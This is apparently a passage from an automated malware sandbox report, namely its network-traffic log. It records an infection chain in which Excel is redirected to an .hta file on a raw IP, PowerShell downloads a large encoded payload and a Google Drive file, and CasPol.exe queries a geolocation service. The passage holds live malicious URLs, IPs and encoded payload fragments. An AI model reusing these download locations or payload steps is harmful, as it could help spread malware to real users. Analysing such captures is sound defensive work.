                                                                                                                                                                                                                  Data Ascii: 'Use -username and -password. ASSERTBOOL optDic.ArgumentExists(NPARA_USERNAME), "The '-" & N
                                                                                                                                                                                                                  Oct 31, 2024 05:14:05.455022097 CET1236INData Raw: 00 27 00 20 00 6f 00 70 00 74 00 69 00 6f 00 6e 00 20 00 6d 00 75 00 73 00 74 00 20 00 62 00 65 00 20 00 73 00 70 00 65 00 63 00 69 00 66 00 69 00 65 00 64 00 20 00 66 00 6f 00 72 00 20 00 27 00 2d 00 61 00 75 00 74 00 68 00 3a 00 64 00 69 00 67
                                                                                                                                                                                                                  Data Ascii: ' option must be specified for '-auth:digest'" ASSERTBOOL not optDic.ArgumentExists(NPARA_CERT), "The '-
                                                                                                                                                                                                                  Oct 31, 2024 05:14:05.455066919 CET1236INData Raw: 00 65 00 72 00 6f 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 63 00 61 00 73 00 65 00 20 00 56 00 41 00 4c 00 5f 00 4e 00 45 00 47 00 4f 00 54 00 49 00 41 00 54 00 45 00 0d 00 0a 00 20 00 20 00 20
                                                                                                                                                                                                                  Data Ascii: eros case VAL_NEGOTIATE '-username and -password are optional. ASSERTBOO
                                                                                                                                                                                                                  Oct 31, 2024 05:14:05.455081940 CET1236INData Raw: 00 4f 00 4f 00 4c 00 20 00 6e 00 6f 00 74 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 55 00 53 00 45 00 52 00 4e
                                                                                                                                                                                                                  Data Ascii: OOL not optDic.ArgumentExists(NPARA_USERNAME), "The '-" & NPARA_USERNAME & "' option is not valid for '-auth:certificate'
                                                                                                                                                                                                                  Oct 31, 2024 05:14:05.460513115 CET1236INData Raw: 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 55 00 53 00 45 00 52 00 4e 00 41 00 4d 00 45 00 29 00 2c 00 20 00 22 00 54 00 68 00 65 00 20 00 27 00 2d 00 22 00 20 00 26 00 20 00 4e
                                                                                                                                                                                                                  Data Ascii: umentExists(NPARA_USERNAME), "The '-" & NPARA_USERNAME & "' option must be specified for '-auth:credssp'"


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  3192.168.2.2249172107.174.146.46803004C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Oct 31, 2024 05:14:19.219414949 CET488OUTGET /57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta HTTP/1.1
                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                  If-Modified-Since: Wed, 30 Oct 2024 17:45:29 GMT
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Host: 107.174.146.46
                                                                                                                                                                                                                  If-None-Match: "33796-625b5448e34a0"
                                                                                                                                                                                                                  Oct 31, 2024 05:14:19.844619989 CET275INHTTP/1.1 304 Not Modified
                                                                                                                                                                                                                  Date: Thu, 31 Oct 2024 04:14:19 GMT
                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                                                                                                                                  Last-Modified: Wed, 30 Oct 2024 17:45:29 GMT
                                                                                                                                                                                                                  ETag: "33796-625b5448e34a0"
                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                  Connection: Keep-Alive


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  4192.168.2.2249174107.174.146.46802140C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Oct 31, 2024 05:14:32.743122101 CET79OUTGET /57/RFGGVFRR.txt HTTP/1.1
                                                                                                                                                                                                                  Host: 107.174.146.46
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.425896883 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Thu, 31 Oct 2024 04:14:33 GMT
                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                                                                                                                                  Last-Modified: Wed, 30 Oct 2024 17:56:57 GMT
                                                                                                                                                                                                                  ETag: "a1000-625b56d8cac99"
                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                  Content-Length: 659456
                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Content-Type: text/plain
                                                                                                                                                                                                                  Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.425916910 CET1236INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                                                                                                                                                                                                  Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1AVNMVDS1gTN0UDJ1wQN
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.425929070 CET1236INData Raw: 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44
                                                                                                                                                                                                                  Data Ascii: xDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.425944090 CET1236INData Raw: 77 78 4f 59 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 6b 53 44 6f 30 77 4a 4e 59 53 44 6c 30 41 4a 4e 4d 53 44 69 30 51 49 4e 41 53 44 66 30 67 48 4e 30 52 44 63 30 77 47 4e 6f 52 44 59 30 77 46 4e 59 52 44 56 30 41 46 4e 4d 52 44 52 30 67 44
                                                                                                                                                                                                                  Data Ascii: wxOYAAAAAOAFAOAAAANkSDo0wJNYSDl0AJNMSDi0QINASDf0gHN0RDc0wGNoRDY0wFNYRDV0AFNMRDR0gDN0QDM0wCNoQDJ0ACNcQDF0ABNMQDC0QANAMD/zg/MwPD6AAAAcBQBQDgO8rD+6QvOwrD76guOkrD46wtOYrD16AtOMrDy6QsOArDv6grO0qDs6wqOoqDp6AqOcqDm6QpOQqDj6goOEqDg6wnO4pDd6AnOspDa6QmO
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.425956011 CET848INData Raw: 79 44 6e 38 51 4a 50 4d 79 44 68 38 77 48 50 30 78 44 62 38 51 47 50 63 78 44 56 38 77 45 50 45 78 44 50 38 51 44 50 73 77 44 4a 38 77 42 50 55 77 44 44 38 51 77 4f 38 76 44 39 37 77 2b 4f 6b 76 44 33 37 51 39 4f 4d 76 44 78 37 77 37 4f 30 75 44
                                                                                                                                                                                                                  Data Ascii: yDn8QJPMyDh8wHP0xDb8QGPcxDV8wEPExDP8QDPswDJ8wBPUwDD8QwO8vD97w+OkvD37Q9OMvDx7w7O0uDr7Q6OcuDl7w4OEuDf7Q3OstDZ7w1OUtDT7Q0O8sDN7wyOksDH7QxOMsDB6wvO0rD76QuOcrD16wsOErDv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.425966024 CET1236INData Raw: 63 44 4b 33 51 79 4e 49 63 44 42 33 41 67 4e 73 62 44 36 32 51 75 4e 67 62 44 33 32 67 74 4e 55 62 44 30 32 51 6b 4e 41 5a 44 50 32 67 69 4e 6b 59 44 49 32 77 68 4e 59 59 44 46 32 41 68 4e 4d 59 44 41 31 77 66 4e 34 58 44 39 31 41 66 4e 73 58 44
                                                                                                                                                                                                                  Data Ascii: cDK3QyNIcDB3AgNsbD62QuNgbD32gtNUbD02QkNAZDP2giNkYDI2whNYYDF2AhNMYDA1wfN4XD91AfNsXD61QeNgXD31gdNUXD01wcNIXDx1AcN8WDu1QbNwWDr1gaNkWDo1wZNYWDl1AZNMWDi1QYNAWDf1gXN0VDc1wWNoVDZ1AWNcVDW1QVNQVDT1gUNEVDQ1wTN4UDN1ATNsUDK1QSNgUDH1gRNUUDE1wQNIUDAAAQAsBQB
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.425977945 CET1236INData Raw: 30 4a 50 57 71 54 30 36 55 70 4f 44 71 54 63 36 38 6c 4f 4e 6c 44 6d 32 38 71 4e 77 5a 6a 58 32 77 6b 4e 36 59 44 4b 32 59 68 4e 45 55 6a 38 31 41 65 4e 4f 58 44 76 31 6f 61 4e 59 57 44 56 31 41 45 4e 77 54 54 36 30 34 4b 4e 59 53 6a 5a 30 6f 46
                                                                                                                                                                                                                  Data Ascii: 0JPWqT06UpODqTc68lONlDm28qNwZjX2wkN6YDK2YhNEUj81AeNOXDv1oaNYWDV1AENwTT604KNYSjZ0oFNrQjHzA+M/OTtzI6M4Nzbzg2MmMzHyUuMPLDuyErMIKDgyMmMVJjRyYQMsDAAAgHAFAAAAAwPU/jp/k3Pn9zT/YkPJ7jA9sePe3T09QcPD2jd98WPo1TY8QOPZzzu8QJPyxzR8MxOvvD47Y9OPrj864JO4jjk3Q9N
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.425988913 CET1236INData Raw: 66 7a 49 33 51 67 4e 69 62 44 64 32 49 6c 4e 43 5a 54 4c 32 4d 53 4e 43 57 54 62 31 51 57 4e 58 56 44 54 30 59 50 4e 75 54 54 79 30 45 4d 4e 54 53 44 6a 30 73 48 4e 78 52 7a 5a 30 41 47 4e 52 52 7a 53 30 51 45 4e 35 49 54 76 79 49 72 4d 53 46 6a
                                                                                                                                                                                                                  Data Ascii: fzI3QgNibDd2IlNCZTL2MSNCWTb1QWNXVDT0YPNuTTy0EMNTSDj0sHNxRzZ0AGNRRzS0QEN5ITvyIrMSFj+xQfMuHz2x0cMFHjrxQaMZGzkx4YMpFDYxwTM0AT9w0OMsCTow4EMIBAAAAKAEAJA/E+PZ/zy/M8P6+Ts/k6Ph+Tm/44P89Dd/g2Pg9zV/40PG9jP/YzPu8TI/UxPN4zz+MqP35DU+okPE5jP+YjPy4zJ+ghPM0z+
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.426044941 CET1236INData Raw: 45 69 4f 33 72 44 32 34 6f 4c 4f 31 69 7a 68 34 59 47 4f 68 68 6a 4c 34 63 43 4f 49 63 6a 2f 33 67 2f 4e 5a 66 7a 7a 31 73 64 4e 51 58 7a 6c 31 34 59 4e 6a 55 54 48 31 63 52 4e 4e 51 54 75 30 55 4b 4e 66 53 54 6a 30 30 45 4e 79 51 44 49 30 38 41
                                                                                                                                                                                                                  Data Ascii: EiO3rD24oLO1izh4YGOhhjL4cCOIcj/3g/NZfzz1sdNQXzl14YNjUTH1cRNNQTu0UKNfSTj00ENyQDI08ANGMD/zQ/MiPjmzE5M/NDez4gM9LD+ywuMnLD1ygsMBLjqyQpM+Jzby8jMjIDExkeMTDznw4GMjBDSwQCMIAAAAgLAEADA/YvPf6Tg+MmPe0DN9cSPX0jC8IFPSwDA7M/OovDx7Q5OHuTb7IgOCnzH5owNNYDr2ISN
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.426058054 CET848INData Raw: 64 6a 64 33 49 33 4e 75 64 6a 61 41 41 41 41 67 43 77 41 41 43 41 41 41 55 6a 59 41 41 41 41 4d 41 77 41 77 42 77 50 51 2f 44 57 2f 55 45 50 73 79 44 71 38 51 4b 50 67 79 7a 6d 38 59 46 50 41 73 44 2f 37 67 2f 4f 30 76 7a 37 37 67 2b 4f 78 71 7a
                                                                                                                                                                                                                  Data Ascii: djd3I3NudjaAAAAgCwAACAAAUjYAAAAMAwAwBwPQ/DW/UEPsyDq8QKPgyzm8YFPAsD/7g/O0vz77g+OxqzA5UfOXnDx3wyNocDJ3AyNbYj12AoN8ZDe2QnNvZDa2EDNDSTd0cFNENDlzE1MLNzOzIhMpLzwyEqMbKTjygoMCKDfyYnMxJzayUmMfJjWyQlMOJDSyMkM9IzNyEjMsIjJyAiMaITFy8gMJIzAx4fM4Hj8xweMnHT4
                                                                                                                                                                                                                  Oct 31, 2024 05:14:33.431035995 CET1236INData Raw: 47 54 6b 78 73 59 4d 46 47 6a 55 78 6b 55 4d 35 45 54 4b 78 6b 52 4d 50 45 54 42 77 38 50 4d 36 44 54 38 77 55 4f 4d 64 44 54 31 77 30 4d 4d 47 44 7a 76 77 67 4c 4d 78 43 6a 71 77 4d 4b 4d 63 43 6a 6c 77 41 4a 4d 4b 43 44 68 77 34 48 4d 65 42 7a
                                                                                                                                                                                                                  Data Ascii: GTkxsYMFGjUxkUM5ETKxkRMPETBw8PM6DT8wUOMdDT1w0MMGDzvwgLMxCjqwMKMcCjlwAJMKCDhw4HMeBzVwwEMDBTLwgAMDAAABgGADAFA/09PY/D0/o8PB/zm/Q3Pu9TX/U1Pm8TG/AxPB4T9+otPO6Tc+4lPP5jR+sjPu4TJ98ePo3T29IZPK2Tg88OPkzTy8sLPoyDl84IP2xTY8sFPDxzL8cyOfvT27E8Obuji7A4Ohpjt


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  5192.168.2.2249177178.237.33.50802756C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Oct 31, 2024 05:14:36.302911997 CET71OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                                                  Host: geoplugin.net
                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.177534103 CET1165INHTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Thu, 31 Oct 2024 04:14:37 GMT
                                                                                                                                                                                                                  server: Apache
                                                                                                                                                                                                                  content-length: 957
                                                                                                                                                                                                                  content-type: application/json; charset=utf-8
                                                                                                                                                                                                                  cache-control: public, max-age=300
                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: { "geoplugin_request":"173.254.250.77", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Killeen", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"625", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"31.0065", "geoplugin_longitude":"-97.8406", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  0192.168.2.2249161172.67.162.954433460C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-10-31 04:13:55 UTC383OUTGET /KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain HTTP/1.1
                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                  Host: acesso.run
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2024-10-31 04:13:55 UTC1063INHTTP/1.1 302 Found
                                                                                                                                                                                                                  Date: Thu, 31 Oct 2024 04:13:55 GMT
                                                                                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                  Content-Length: 99
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  X-DNS-Prefetch-Control: off
                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                                  X-Download-Options: noopen
                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                  Location: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta
                                                                                                                                                                                                                  Vary: Accept
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CG3%2FHLXgSlVvkEWEEckzE3yVcVtkAvtWUHJh%2BvereQXX68GFVxvc%2FGLZljeHUBwdR7h3%2F1cjNrEa%2BUpxIaeI7PIMJMG3aoF0dRSGPC%2F1QoQj%2FlzUsVjCHgKfJUX6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8db0d0b35e59479a-DFW
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1014&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=965&delivery_rate=2760724&cwnd=252&unsent_bytes=0&cid=102713c2ec426112&ts=332&x=0"
                                                                                                                                                                                                                  2024-10-31 04:13:55 UTC99INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 37 2e 31 37 34 2e 31 34 36 2e 34 36 2f 35 37 2f 6e 6f 63 2f 65 72 6e 61 73 68 67 65 74 6d 65 62 61 63 6b 77 69 74 68 67 6f 6f 64 6e 65 77 73 77 68 69 63 68 67 72 72 65 61 74 74 68 69 6e 67 73 2e 68 74 61
                                                                                                                                                                                                                  Data Ascii: Found. Redirecting to http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  1192.168.2.2249163104.21.74.1914433720C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-10-31 04:13:57 UTC407OUTGET /KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain HTTP/1.1
                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                  Host: acesso.run
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2024-10-31 04:13:57 UTC1057INHTTP/1.1 302 Found
                                                                                                                                                                                                                  Date: Thu, 31 Oct 2024 04:13:57 GMT
                                                                                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                  Content-Length: 99
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  X-DNS-Prefetch-Control: off
                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                                  X-Download-Options: noopen
                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                  Location: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta
                                                                                                                                                                                                                  Vary: Accept
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r1ZKOFCsiulKlj93WgxGV6KqQjT%2BNj%2BPqDuIY5NoifTzpkH0jehX2n2A6bmHYUvmUQHFlbCd%2BTTugiG5gJ6MsqIMZ8NDugNw6PWe2tZKCu204iv8uA1pEaDo%2Bhfc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8db0d0c10c830bf3-DFW
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1373&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=989&delivery_rate=2197268&cwnd=247&unsent_bytes=0&cid=4ce70cf3717e704d&ts=540&x=0"
                                                                                                                                                                                                                  2024-10-31 04:13:57 UTC99INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 37 2e 31 37 34 2e 31 34 36 2e 34 36 2f 35 37 2f 6e 6f 63 2f 65 72 6e 61 73 68 67 65 74 6d 65 62 61 63 6b 77 69 74 68 67 6f 6f 64 6e 65 77 73 77 68 69 63 68 67 72 72 65 61 74 74 68 69 6e 67 73 2e 68 74 61
                                                                                                                                                                                                                  Data Ascii: Found. Redirecting to http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  2192.168.2.2249166142.250.184.2064432140C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-10-31 04:14:12 UTC121OUTGET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1
                                                                                                                                                                                                                  Host: drive.google.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2024-10-31 04:14:12 UTC1319INHTTP/1.1 303 See Other
                                                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
